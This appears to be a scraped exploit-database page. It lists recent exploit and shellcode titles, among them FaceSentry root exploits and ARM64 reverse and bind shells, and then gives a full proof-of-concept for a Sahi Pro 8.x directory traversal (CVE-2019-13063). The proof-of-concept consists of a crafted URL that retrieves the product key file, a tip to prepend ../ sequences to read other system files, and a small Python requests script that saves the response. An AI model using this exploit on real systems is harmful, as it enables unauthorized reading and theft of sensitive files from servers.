
24 changes to exploits/shellcodes Linux Mint 18.3-19.1 - 'yelp' Command Injection FaceSentry Access Control System 6.4.8 - Remote SSH Root WorkSuite PRM 2.4 - 'password' SQL Injection CiuisCRM 1.6 - 'eventType' SQL Injection Varient 1.6.1 - SQL Injection PowerPanel Business Edition - Cross-Site Scripting ZoneMinder 1.32.3 - Cross-Site Scripting SAP Crystal Reports - Information Disclosure Sahi pro 8.x - Directory Traversal CyberPanel 1.8.4 - Cross-Site Request Forgery FaceSentry Access Control System 6.4.8 - Remote Command Injection FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery FaceSentry Access Control System 6.4.8 - Remote Root Exploit Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) Shellcode (40 Bytes) Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes) Linux/ARM64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (128 bytes) Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (176 bytes) Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes) Linux/ARM64 - Read /etc/passwd Shellcode (120 Bytes) Linux/ARM64 - Egghunter (PWN!PWN!) + execve(_/bin/sh__ NULL_ NULL) + mprotect() Shellcode (88 Bytes) Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes) Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes) Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes) Linux/x86 - execve /bin/sh using JMP-CALL-POP Shellcode (21 bytes)
40 lines
No EOL
1.6 KiB
Python
Executable file
40 lines
No EOL
1.6 KiB
Python
Executable file
# Exploit Title: Sahi pro (8.x) Directory traversal
|
|
# Date: 25/06/2019
|
|
# Exploit Author: Alexander Bluestein
|
|
# Vendor Homepage: https://sahipro.com/
|
|
# Software Link: https://sahipro.com/downloads-archive/
|
|
# Version: 8.0
|
|
# Tested on: Linux Ubuntu / Windows 7
|
|
# CVE: CVE-2019-13063
|
|
|
|
An issue was discovered in Safi-pro web-application, there is a directory traversal and both local and remote file inclusion vulnerability which resides in the ?script= parameter which is found on the Script_View page. And attacker can send a specially crafted URL to retrieve and steal sensitive files from teh victim.
|
|
|
|
POC -
|
|
|
|
http://10.0.0.167:9999/_s_/dyn/Script_view?script=/config/productkey.txt
|
|
|
|
This results in the revealing of the applications product key. The ?script= can have ../../../../../ added to retrieve more files from the system
|
|
|
|
POC tool -
|
|
|
|
import argparse, requests, os
|
|
|
|
#sahi_productkey = '/config/productkey.txt'
|
|
#root_dir = '../../../../../../'
|
|
#vuln_url = "http://10.0.0.167:9999/_s_/dyn/Script_view?script="
|
|
|
|
print("[x] Proof of concept tool to exploit the directory traversal and local file"
|
|
" inclusion vulnerability that resides in the [REDACTED]\n[x] CVE-2019-xxxxxx\n")
|
|
|
|
print("Example usage:\npython POC.y --url http://example:9999/_s_/dyn/Script_view?script=/config/productkey.txt")
|
|
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument("--url",
|
|
help='Specify the vulnerable URL')
|
|
|
|
args = parser.parse_args()
|
|
|
|
response = requests.get(args.url)
|
|
file = open("output.txt", "w")
|
|
file.write(response.text)
|
|
file.close() |